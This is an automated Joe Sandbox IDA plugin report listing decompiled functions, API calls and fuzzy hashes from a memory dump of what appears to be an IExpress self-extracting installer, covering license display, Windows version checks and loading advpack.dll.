Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 60dac5a7d8911d03d61d7ec110844d56525883139c6a4e925a90cfee01f01065
Instruction ID: a4dc00dc2de3f8066d6f76006d5c37d2ec761abfff5dd64115bb48f6a9e53c6e
Opcode Fuzzy Hash: 60dac5a7d8911d03d61d7ec110844d56525883139c6a4e925a90cfee01f01065
Instruction Fuzzy Hash: EB31A031A08218DFDF31AB15CD04BEEB7BCEB45728F0141E6E9C9A6280DB3699858F51

Uniqueness

Uniqueness Score: -1.00%

Function 01083A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01083A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0108468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x1088d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0108468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x1088d4c, "<None>") == 0) {
							LocalFree( *0x1088d4c);
							L9:
							 *0x1089124 = 0;
							return 1;
						}
						_t9 = E01086517(_t19, 0x7d1, 0, E01083100, 0, 0);
						LocalFree( *0x1088d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x1089124 = 0x800704c7;
						L2:
						return 0;
					}
					E010844B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x1088d4c);
					 *0x1089124 = 0x80070714;
					goto L2;
				}
				E010844B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x1089124 = E01086285();
				goto L2;
			}

0x01083a46
0x01083a57
0x01083a5d
0x01083a63
0x01083a6a
0x01083a91
0x01083a9a
0x01083ad8
0x01083b13
0x01083b19
0x01083b1b
0x00000000
0x01083b21
0x01083ae7
0x01083af4
0x01083afc
0x00000000
0x00000000
0x01083afe
0x01083a87
0x00000000
0x01083a87
0x01083aa8
0x01083ab3
0x01083ab9
0x00000000
0x01083ab9
0x01083a78
0x01083a82
0x00000000

APIs

Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
Part of subcall function 0108468F: SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
Part of subcall function 0108468F: LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
Part of subcall function 0108468F: LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
Part of subcall function 0108468F: memcpy_s.MSVCRT ref: 010846E5
Part of subcall function 0108468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01082F64,?,00000002,00000000), ref: 01083A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 01083AB3

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Part of subcall function 01086285: GetLastError.KERNEL32(01085BBC), ref: 01086285

lstrcmpA.KERNEL32(<None>,00000000), ref: 01083AD0
LocalFree.KERNEL32 ref: 01083B13

Part of subcall function 01086517: FindResourceA.KERNEL32(01080000,000007D6,00000005), ref: 0108652A
Part of subcall function 01086517: LoadResource.KERNEL32(01080000,00000000,?,?,01082EE8,00000000,010819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01086538
Part of subcall function 01086517: DialogBoxIndirectParamA.USER32(01080000,00000000,00000547,010819E0,00000000), ref: 01086557
Part of subcall function 01086517: FreeResource.KERNEL32(00000000,?,?,01082EE8,00000000,010819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01086560

LocalFree.KERNEL32(00000000,01083100,00000000,00000000), ref: 01083AF4

Strings

LICENSE, xrefs: 01083A46
<None>, xrefs: 01083AC5

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: a76d10ffe7d104d7a3618c9f350ef092af85cf7d5d66ad0cfd61f302b8792df2
Instruction ID: bbbc3e7720eb4eb63f6cfb4b6943e008c5249dfa39001d6940c985bf450b9c41
Opcode Fuzzy Hash: a76d10ffe7d104d7a3618c9f350ef092af85cf7d5d66ad0cfd61f302b8792df2
Instruction Fuzzy Hash: 5911A27070C201ABD734BF669C08E2F7AA9EBD5B10B00803FB6C1DA544DA7FC8018B64

Uniqueness

Uniqueness Score: -1.00%

Function 010824E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E010824E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0108658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E01086CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x010824e0
0x010824eb
0x010824f2
0x010824f7
0x01082504
0x0108250e
0x0108251d
0x0108252c
0x01082541
0x01082546
0x01082553
0x01082555
0x01082555
0x01082546
0x0108256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 01082506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0108252C
_lopen.KERNEL32(?,00000040), ref: 0108253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0108254C
_lclose.KERNEL32(00000000), ref: 01082555

Strings

wininit.ini, xrefs: 01082510

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: d5cc0aa1d6a08e143a6558338c7b8445290ed298fb628354dcbe560a5bec08c5
Instruction ID: 3fbb18914030881c451b135f34f064735408b8b2b9997b16f9d548b708c9fcf0
Opcode Fuzzy Hash: d5cc0aa1d6a08e143a6558338c7b8445290ed298fb628354dcbe560a5bec08c5
Instruction Fuzzy Hash: AB01B931708118A7D730AA65DC0CEDF7B7CDB55760F000155FAC5D7144DA794A42CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010836EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E010836EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x1088184 = 1;
						 *0x1088180 = 1;
						L13:
						 *0x1089a40 = _t119;
						L14:
						__eflags =  *0x1088a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E01082A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E01082A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x1088a38 & 0x00000001;
											if(( *0x1088a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0108681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E010867C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E010828E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x1089a40 = _t119;
						 *0x1088184 = 1;
						 *0x1088180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x1089a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x1088184 = _t135;
							 *0x1088180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E010844B9(0, _t138);
					L66:
					return E01086CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x010836f9
0x01083700
0x0108370c
0x01083716
0x01083718
0x0108371b
0x01083721
0x0108372b
0x0108373d
0x01083745
0x01083746
0x01083746
0x01083749
0x010837ab
0x010837ad
0x010837ae
0x010837b3
0x010837b8
0x010837b8
0x010837bf
0x010837bf
0x010837c5
0x00000000
0x00000000
0x010837cb
0x010837cd
0x00000000
0x00000000
0x010837d5
0x010837db
0x010837e8
0x010837ea
0x010837ea
0x010837ea
0x010837f0
0x010837f6
0x01083805
0x01083817
0x0108382b
0x01083830
0x01083836
0x0108383b
0x0108383d
0x010838eb
0x010838eb
0x010838f2
0x0108390c
0x01083911
0x01083911
0x01083913
0x0108394d
0x0108394d
0x0108394f
0x010838a9
0x010838a9
0x010838b0
0x010838b2
0x010838b9
0x010838bb
0x010838c1
0x01083975
0x010838c7
0x010838de
0x010838e0
0x010838e0
0x0108397b
0x0108397d
0x010839a9
0x0108397f
0x01083982
0x0108398b
0x0108398d
0x0108398f
0x0108399f
0x010839a1
0x01083991
0x01083991
0x01083991
0x0108398f
0x010839af
0x010839b6
0x01083a0f
0x01083a0f
0x01083a11
0x01083a13
0x01083a19
0x00000000
0x010839b8
0x010839b8
0x010839ba
0x00000000
0x00000000
0x010839bc
0x010839bf
0x00000000
0x00000000
0x010839c3
0x010839c9
0x010839ce
0x010839d0
0x010839e3
0x010839e5
0x010839e6
0x010839f1
0x010839f7
0x010839fa
0x01083a01
0x01083a04
0x00000000
0x00000000
0x01083a06
0x01083a09
0x01083a09
0x01083a0b
0x01083a0b
0x00000000
0x01083a09
0x010839fc
0x00000000
0x010839fc
0x010839d3
0x010839d8
0x010839da
0x00000000
0x00000000
0x00000000
0x010839dc
0x010839b6
0x01083955
0x0108395b
0x00000000
0x00000000
0x01083961
0x01083963
0x00000000
0x00000000
0x01083969
0x01083969
0x00000000
0x01083969
0x01083915
0x01083915
0x0108391b
0x0108391f
0x00000000
0x00000000
0x0108392d
0x01083933
0x01083938
0x0108393a
0x00000000
0x00000000
0x01083940
0x01083946
0x0108394b
0x00000000
0x0108394b
0x00000000
0x010838f2
0x01083843
0x01083845
0x00000000
0x00000000
0x0108384b
0x0108384d
0x01083883
0x01083885
0x00000000
0x00000000
0x0108389a
0x0108389e
0x0108389e
0x00000000
0x00000000
0x010838a0
0x010838a0
0x010838a2
0x00000000
0x00000000
0x010838a4
0x00000000
0x010838a4
0x0108384f
0x01083851
0x01083857
0x0108386e
0x01083877
0x0108387b
0x00000000
0x00000000
0x00000000
0x01083881
0x01083859
0x0108385c
0x01083862
0x01083866
0x00000000
0x00000000
0x01083868
0x00000000
0x010838f4
0x010838f4
0x010838f5
0x010838fb
0x01083901
0x01083901
0x00000000
0x0108390a
0x0108374b
0x0108374e
0x0108375c
0x01083764
0x01083769
0x0108376e
0x01083771
0x0108379c
0x0108379f
0x00000000
0x00000000
0x010837a3
0x010837a4
0x00000000
0x010837a4
0x01083773
0x01083777
0x01083778
0x0108377f
0x01083781
0x0108378e
0x0108378e
0x01083794
0x00000000
0x01083794
0x01083783
0x00000000
0x00000000
0x01083785
0x0108378c
0x00000000
0x00000000
0x00000000
0x0108378c
0x01083750
0x00000000
0x0108372d
0x0108372d
0x0108396b
0x0108396b
0x0108396c
0x0108396e
0x0108396f
0x01083a1e
0x01083a1e
0x01083a22
0x01083a27
0x01083a3e
0x01083a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 01083723
MessageBeep.USER32(00000000), ref: 010839C3
MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 010839F1

Strings

3, xrefs: 01083785
lenta, xrefs: 010839E9, 01083A19

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lenta
API String ID: 2519184315-4216304122
Opcode ID: fe2ccd0cc6cbea37a27ff2c2198c975dc2402d16c79977ef296e9e147c92aa1c
Instruction ID: b446a90f15db5ff69a4bcc6ba9b8efbd08d16618412179aa9f6658c2d4d54591
Opcode Fuzzy Hash: fe2ccd0cc6cbea37a27ff2c2198c975dc2402d16c79977ef296e9e147c92aa1c
Instruction Fuzzy Hash: 7191D371E192259BEBB5BA18C8807EEBBA5FBC5B04F0540EAC9C99F241D735C980CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01086495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E01086495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E01081781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E0108658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E01086CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x01086495
0x01086495
0x010864a0
0x010864a7
0x010864ab
0x010864bd
0x010864c2
0x010864d3
0x010864df
0x010864e8
0x01086502
0x010864ee
0x010864f9
0x010864f9
0x01086516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010864DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010864F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 01086502

Strings

advpack.dll, xrefs: 010864C2, 010864CD, 01086501
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010864AC

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-1655358546
Opcode ID: 2ad6fa33ee3f11683fca6bdab3fc714687bf5719bff5e445206d5cef890b4f94
Instruction ID: 82c2b251486b0c36bfbbf5386b7594e505745093e830976723778b0104da5224
Opcode Fuzzy Hash: 2ad6fa33ee3f11683fca6bdab3fc714687bf5719bff5e445206d5cef890b4f94
Instruction Fuzzy Hash: 2D01D630A0C1089BDB60FB64DC48AEE7778EB60310F500199F5C5971C4DF76AA868B51

Uniqueness

Uniqueness Score: -1.00%

Function 010828E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E01082773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E01082A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E01082A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x010828f1
0x010828f4
0x010828f7
0x010828f9
0x010828fc
0x010828ff
0x01082901
0x01082907
0x01082a62
0x01082a64
0x0108290d
0x0108290d
0x0108290f
0x01082912
0x01082920
0x01082937
0x00000000
0x00000000
0x01082944
0x0108294a
0x0108294f
0x01082a2f
0x01082a32
0x01082a34
0x01082a37
0x01082a41
0x00000000
0x00000000
0x01082955
0x0108295e
0x01082962
0x01082969
0x0108296f
0x01082974
0x0108298c
0x01082a20
0x01082a21
0x01082a27
0x01082a4c
0x01082a4f
0x01082a50
0x01082a53
0x01082a56
0x01082a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x010829b2
0x010829b2
0x010829b5
0x010829bd
0x010829c3
0x010829cc
0x010829d5
0x010829d7
0x010829da
0x010829dd
0x010829df
0x010829ec
0x010829f8
0x010829fc
0x010829ff
0x01082a02
0x01082a07
0x01082a0a
0x01082a0f
0x01082a19
0x01082a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01082a0f
0x0108298c
0x01082974
0x01082962
0x00000000
0x0108294f
0x01082912
0x01082a65
0x01082a68
0x01082a6c
0x01082a6f
0x01082a6f
0x01082a7d

APIs

GlobalFree.KERNEL32 ref: 01082A6F

Part of subcall function 01082773: CharUpperA.USER32(4F5B7A6C,00000000,00000000,00000000), ref: 010827A8
Part of subcall function 01082773: CharNextA.USER32(0000054D), ref: 010827B5
Part of subcall function 01082773: CharNextA.USER32(00000000), ref: 010827BC
Part of subcall function 01082773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01082829
Part of subcall function 01082773: RegQueryValueExA.ADVAPI32(?,01081140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01082852
Part of subcall function 01082773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01082870
Part of subcall function 01082773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010828A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,01083938,?,?,?,?,-00000005), ref: 01082958
GlobalLock.KERNEL32 ref: 01082969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,01083938,?,?,?,?,-00000005,?), ref: 01082A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 01082A81

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
